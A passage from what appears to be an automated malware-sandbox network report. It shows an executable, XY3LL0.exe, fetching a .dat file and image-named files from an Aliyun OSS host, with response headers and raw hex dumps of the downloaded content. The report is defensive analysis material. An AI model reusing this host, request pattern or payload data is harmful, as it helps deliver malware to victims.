                                                                                          Data Ascii: ctABCKw4|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT*&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=*SV.c{]=bh&g}|6
                                                                                          2025-01-11 03:44:18 UTC4096INData Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39
                                                                                          Data Ascii: t'FCDEhNOP}bBibcd- O|lno=\{{|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
                                                                                          2025-01-11 03:44:18 UTC4096INData Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe
                                                                                          Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhij*Jpqrs<Syz{4s%~}k*yxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
                                                                                          2025-01-11 03:44:18 UTC955INData Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20
                                                                                          Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8*Sp1l_g;#c!;3c"#%+''&k*+-#//>S235-77


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.949982118.178.60.94434456C:\Users\user\Documents\XY3LL0.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-11 03:44:22 UTC110OUTGET /f.dat HTTP/1.1
                                                                                          User-Agent: GetData
                                                                                          Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                          Cache-Control: no-cache
                                                                                          2025-01-11 03:44:22 UTC558INHTTP/1.1 200 OK
                                                                                          Server: AliyunOSS
                                                                                          Date: Sat, 11 Jan 2025 03:44:22 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Content-Length: 879
                                                                                          Connection: close
                                                                                          x-oss-request-id: 6781E91609E5983337892D37
                                                                                          Accept-Ranges: bytes
                                                                                          ETag: "E54C4296F011EC91D935AA353C936E34"
                                                                                          Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT
                                                                                          x-oss-object-type: Normal
                                                                                          x-oss-hash-crc64ecma: 11142793972884948456
                                                                                          x-oss-storage-class: Standard
                                                                                          x-oss-ec: 0048-00000113
                                                                                          Content-Disposition: attachment
                                                                                          x-oss-force-download: true
                                                                                          Content-MD5: 5UxClvAR7JHZNao1PJNuNA==
                                                                                          x-oss-server-time: 5
                                                                                          2025-01-11 03:44:22 UTC879INData Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31
                                                                                          Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.949983118.178.60.94434456C:\Users\user\Documents\XY3LL0.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-11 03:44:23 UTC115OUTGET /FOM-50.jpg HTTP/1.1
                                                                                          User-Agent: GetData
                                                                                          Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                          Cache-Control: no-cache
                                                                                          2025-01-11 03:44:24 UTC546INHTTP/1.1 200 OK
                                                                                          Server: AliyunOSS
                                                                                          Date: Sat, 11 Jan 2025 03:44:24 GMT
                                                                                          Content-Type: image/jpeg
                                                                                          Content-Length: 55085
                                                                                          Connection: close
                                                                                          x-oss-request-id: 6781E91853BCC63136358C9E
                                                                                          Accept-Ranges: bytes
                                                                                          ETag: "DC44AE348E6A74B3A74871020FDFAC74"
                                                                                          Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT
                                                                                          x-oss-object-type: Normal
                                                                                          x-oss-hash-crc64ecma: 12339968747348072397
                                                                                          x-oss-storage-class: Standard
                                                                                          x-oss-ec: 0048-00000105
                                                                                          Content-Disposition: attachment
                                                                                          x-oss-force-download: true
                                                                                          Content-MD5: 3ESuNI5qdLOnSHECD9+sdA==
                                                                                          x-oss-server-time: 4
                                                                                          2025-01-11 03:44:24 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                          Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                          2025-01-11 03:44:24 UTC4096INData Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96
                                                                                          Data Ascii: |{Atwutse>4HYAVVSRt2Q|(M8B&0:**)TW"TDn*2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
                                                                                          2025-01-11 03:44:24 UTC4096INData Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81
                                                                                          Data Ascii: FG*2<L\"h((JIr0SCF4=8;987@3A>s](Sn*&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
                                                                                          2025-01-11 03:44:24 UTC4096INData Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4
                                                                                          Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn*{75|?flLOIVw)`]b* hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
                                                                                          2025-01-11 03:44:24 UTC4096INData Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1
                                                                                          Data Ascii: xryQGT*_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALr*i.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{|}{
                                                                                          2025-01-11 03:44:24 UTC4096INData Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47
                                                                                          Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6*:9FQ4( "pI$et)3q}Y/I*Z!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
                                                                                          2025-01-11 03:44:24 UTC4096INData Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a
                                                                                          Data Ascii: yv#{wofKlY%'\*JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u*`vRP;\Xf b$*m*-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
                                                                                          2025-01-11 03:44:24 UTC4096INData Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5
                                                                                          Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
                                                                                          2025-01-11 03:44:24 UTC4096INData Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81
                                                                                          Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-*C.G!"#$g()*+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{|
                                                                                          2025-01-11 03:44:24 UTC4096INData Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91
                                                                                          Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~o


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.949984118.178.60.94434456C:\Users\user\Documents\XY3LL0.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-11 03:44:25 UTC115OUTGET /FOM-51.jpg HTTP/1.1
                                                                                          User-Agent: GetData
                                                                                          Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                          Cache-Control: no-cache
                                                                                          2025-01-11 03:44:26 UTC547INHTTP/1.1 200 OK
                                                                                          Server: AliyunOSS
                                                                                          Date: Sat, 11 Jan 2025 03:44:25 GMT
                                                                                          Content-Type: image/jpeg
                                                                                          Content-Length: 4859125
                                                                                          Connection: close
                                                                                          x-oss-request-id: 6781E919DC44E039366DD0EC
                                                                                          Accept-Ranges: bytes
                                                                                          ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02"
                                                                                          Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT
                                                                                          x-oss-object-type: Normal
                                                                                          x-oss-hash-crc64ecma: 9060732723227198118
                                                                                          x-oss-storage-class: Standard
                                                                                          x-oss-ec: 0048-00000105
                                                                                          Content-Disposition: attachment
                                                                                          x-oss-force-download: true
                                                                                          Content-MD5: 7myj7qf5scgQWa71cKKMAg==
                                                                                          x-oss-server-time: 2
                                                                                          2025-01-11 03:44:26 UTC3549INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                          Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                          2025-01-11 03:44:26 UTC4096INData Raw: cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66 9c
                                                                                          Data Ascii: ;K5Aat=BGjD=|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@|-$XW9!][b-I^pHcf
                                                                                          2025-01-11 03:44:26 UTC4096INData Raw: c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14 f3
                                                                                          Data Ascii: xd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
